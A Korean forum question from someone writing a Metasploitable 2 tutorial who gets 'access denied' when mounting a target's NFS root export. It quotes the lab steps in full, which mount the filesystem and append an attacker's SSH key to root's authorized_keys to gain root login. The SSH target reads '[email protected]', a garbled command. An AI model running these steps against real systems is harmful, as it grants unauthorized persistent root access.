mount.nfs: 마운트하는 동안 서버에서 액세스가 거부되었습니다.:/

mount.nfs: 마운트하는 동안 서버에서 액세스가 거부되었습니다.:/

저는 Metasploitable 2 튜토리얼을 작성 중입니다.Rapid7 Mestasploit 튜토리얼 링크

나는 다음을 수행하려고합니다 :

쓰기 가능한 파일 시스템이 있는 시스템에 액세스하는 것은 쉽지 않습니다. 이를 위해(그리고 SSH가 실행 중이기 때문에) 공격 시스템에서 새 SSH 키를 생성하고 NFS 내보내기를 설치한 다음 authorized_keys루트 사용자 계정의 파일에 키를 추가합니다.

root@ubuntu:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.

root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@ubuntu:~# umount /tmp/r00t

root@ubuntu:~# ssh [email protected]
Last login: Fri Jun  1 00:29:33 2012 from 192.168.99.128
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#

다음 명령을 받았을 때:mount -t nfs 192.168.99.131:/ /tmp/r00t/

다음 오류가 발생합니다.

mount.nfs: access denied by server while mounting <IP>:/

어떤 도움이라도 대단히 감사하겠습니다.

관련 정보